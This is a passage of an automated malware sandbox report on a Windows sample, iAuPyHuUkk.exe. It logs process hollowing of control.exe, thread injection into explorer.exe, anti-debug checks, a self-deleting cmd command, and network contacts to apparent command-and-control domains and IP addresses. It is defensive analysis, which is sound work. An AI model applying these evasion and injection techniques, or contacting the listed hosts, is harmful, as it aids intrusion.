            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBC577 mov eax, dword ptr fs:[00000030h]13_2_04BBC577
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBC577 mov eax, dword ptr fs:[00000030h]13_2_04BBC577
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB7D50 mov eax, dword ptr fs:[00000030h]13_2_04BB7D50
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68D34 mov eax, dword ptr fs:[00000030h]13_2_04C68D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C1A537 mov eax, dword ptr fs:[00000030h]13_2_04C1A537
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD3D43 mov eax, dword ptr fs:[00000030h]13_2_04BD3D43
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBB944 mov eax, dword ptr fs:[00000030h]13_2_04BBB944
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBB944 mov eax, dword ptr fs:[00000030h]13_2_04BBB944
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C4FEC0 mov eax, dword ptr fs:[00000030h]13_2_04C4FEC0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAAAB0 mov eax, dword ptr fs:[00000030h]13_2_04BAAAB0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAAAB0 mov eax, dword ptr fs:[00000030h]13_2_04BAAAB0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCFAB0 mov eax, dword ptr fs:[00000030h]13_2_04BCFAB0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68ED6 mov eax, dword ptr fs:[00000030h]13_2_04C68ED6
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B952A5 mov eax, dword ptr fs:[00000030h]13_2_04B952A5
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B952A5 mov eax, dword ptr fs:[00000030h]13_2_04B952A5
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B952A5 mov eax, dword ptr fs:[00000030h]13_2_04B952A5
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B952A5 mov eax, dword ptr fs:[00000030h]13_2_04B952A5
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B952A5 mov eax, dword ptr fs:[00000030h]13_2_04B952A5
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCD294 mov eax, dword ptr fs:[00000030h]13_2_04BCD294
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCD294 mov eax, dword ptr fs:[00000030h]13_2_04BCD294
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2FE87 mov eax, dword ptr fs:[00000030h]13_2_04C2FE87
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA76E2 mov eax, dword ptr fs:[00000030h]13_2_04BA76E2
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC16E0 mov ecx, dword ptr fs:[00000030h]13_2_04BC16E0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C60EA5 mov eax, dword ptr fs:[00000030h]13_2_04C60EA5
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C60EA5 mov eax, dword ptr fs:[00000030h]13_2_04C60EA5
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C60EA5 mov eax, dword ptr fs:[00000030h]13_2_04C60EA5
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C146A7 mov eax, dword ptr fs:[00000030h]13_2_04C146A7
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC36CC mov eax, dword ptr fs:[00000030h]13_2_04BC36CC
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD8EC7 mov eax, dword ptr fs:[00000030h]13_2_04BD8EC7
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9E620 mov eax, dword ptr fs:[00000030h]13_2_04B9E620
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C4B260 mov eax, dword ptr fs:[00000030h]13_2_04C4B260
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C4B260 mov eax, dword ptr fs:[00000030h]13_2_04C4B260
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68A62 mov eax, dword ptr fs:[00000030h]13_2_04C68A62
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB3A1C mov eax, dword ptr fs:[00000030h]13_2_04BB3A1C
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9C600 mov eax, dword ptr fs:[00000030h]13_2_04B9C600
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9C600 mov eax, dword ptr fs:[00000030h]13_2_04B9C600
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9C600 mov eax, dword ptr fs:[00000030h]13_2_04B9C600
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD927A mov eax, dword ptr fs:[00000030h]13_2_04BD927A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBAE73 mov eax, dword ptr fs:[00000030h]13_2_04BBAE73
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBAE73 mov eax, dword ptr fs:[00000030h]13_2_04BBAE73
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBAE73 mov eax, dword ptr fs:[00000030h]13_2_04BBAE73
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBAE73 mov eax, dword ptr fs:[00000030h]13_2_04BBAE73
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBAE73 mov eax, dword ptr fs:[00000030h]13_2_04BBAE73
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA766D mov eax, dword ptr fs:[00000030h]13_2_04BA766D
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99240 mov eax, dword ptr fs:[00000030h]13_2_04B99240
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99240 mov eax, dword ptr fs:[00000030h]13_2_04B99240
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99240 mov eax, dword ptr fs:[00000030h]13_2_04B99240
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99240 mov eax, dword ptr fs:[00000030h]13_2_04B99240
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C4FE3F mov eax, dword ptr fs:[00000030h]13_2_04C4FE3F
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA7E41 mov eax, dword ptr fs:[00000030h]13_2_04BA7E41
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA7E41 mov eax, dword ptr fs:[00000030h]13_2_04BA7E41
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA7E41 mov eax, dword ptr fs:[00000030h]13_2_04BA7E41
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA7E41 mov eax, dword ptr fs:[00000030h]13_2_04BA7E41
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA7E41 mov eax, dword ptr fs:[00000030h]13_2_04BA7E41
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA7E41 mov eax, dword ptr fs:[00000030h]13_2_04BA7E41
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCB390 mov eax, dword ptr fs:[00000030h]13_2_04BCB390
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA1B8F mov eax, dword ptr fs:[00000030h]13_2_04BA1B8F
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA1B8F mov eax, dword ptr fs:[00000030h]13_2_04BA1B8F
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C4D380 mov ecx, dword ptr fs:[00000030h]13_2_04C4D380
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C5138A mov eax, dword ptr fs:[00000030h]13_2_04C5138A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17794 mov eax, dword ptr fs:[00000030h]13_2_04C17794
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17794 mov eax, dword ptr fs:[00000030h]13_2_04C17794
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17794 mov eax, dword ptr fs:[00000030h]13_2_04C17794
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C65BA5 mov eax, dword ptr fs:[00000030h]13_2_04C65BA5
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCE730 mov eax, dword ptr fs:[00000030h]13_2_04BCE730
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B94F2E mov eax, dword ptr fs:[00000030h]13_2_04B94F2E
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B94F2E mov eax, dword ptr fs:[00000030h]13_2_04B94F2E
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68B58 mov eax, dword ptr fs:[00000030h]13_2_04C68B58
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68F6A mov eax, dword ptr fs:[00000030h]13_2_04C68F6A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC3B7A mov eax, dword ptr fs:[00000030h]13_2_04BC3B7A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC3B7A mov eax, dword ptr fs:[00000030h]13_2_04BC3B7A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C6070D mov eax, dword ptr fs:[00000030h]13_2_04C6070D
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C6070D mov eax, dword ptr fs:[00000030h]13_2_04C6070D
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2FF10 mov eax, dword ptr fs:[00000030h]13_2_04C2FF10
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2FF10 mov eax, dword ptr fs:[00000030h]13_2_04C2FF10
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9DB60 mov ecx, dword ptr fs:[00000030h]13_2_04B9DB60
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAFF60 mov eax, dword ptr fs:[00000030h]13_2_04BAFF60
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C5131B mov eax, dword ptr fs:[00000030h]13_2_04C5131B
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9F358 mov eax, dword ptr fs:[00000030h]13_2_04B9F358
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9DB40 mov eax, dword ptr fs:[00000030h]13_2_04B9DB40
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAEF40 mov eax, dword ptr fs:[00000030h]13_2_04BAEF40
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00409B50 LdrLoadDll,3_2_00409B50
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.vintagepaseo.com
            Source: C:\Windows\explorer.exeDomain query: www.brandmty.net
            Source: C:\Windows\explorer.exeDomain query: www.iphone13promax.design
            Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.umdasch-lagertechnik.com
            Source: C:\Windows\explorer.exeDomain query: www.districonio.com
            Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.226 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 154.216.110.149 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.cyebang.com
            Source: C:\Windows\explorer.exeDomain query: www.xn--aprendes-espaol-brb.com
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: D20000Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeThread register set: target process: 3440Jump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeThread register set: target process: 3440Jump to behavior
            Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3440Jump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess created: C:\Users\user\Desktop\iAuPyHuUkk.exe C:\Users\user\Desktop\iAuPyHuUkk.exeJump to behavior
            Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'Jump to behavior
            Source: explorer.exe, 00000005.00000000.424529309.00000000083E9000.00000004.00000001.sdmp, control.exe, 0000000D.00000002.619899618.0000000003420000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000005.00000000.393638148.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000000D.00000002.619899618.0000000003420000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000005.00000000.393638148.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000000D.00000002.619899618.0000000003420000.00000002.00020000.sdmpBinary or memory string: &Program Manager
            Source: explorer.exe, 00000005.00000000.393638148.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000000D.00000002.619899618.0000000003420000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Users\user\Desktop\iAuPyHuUkk.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
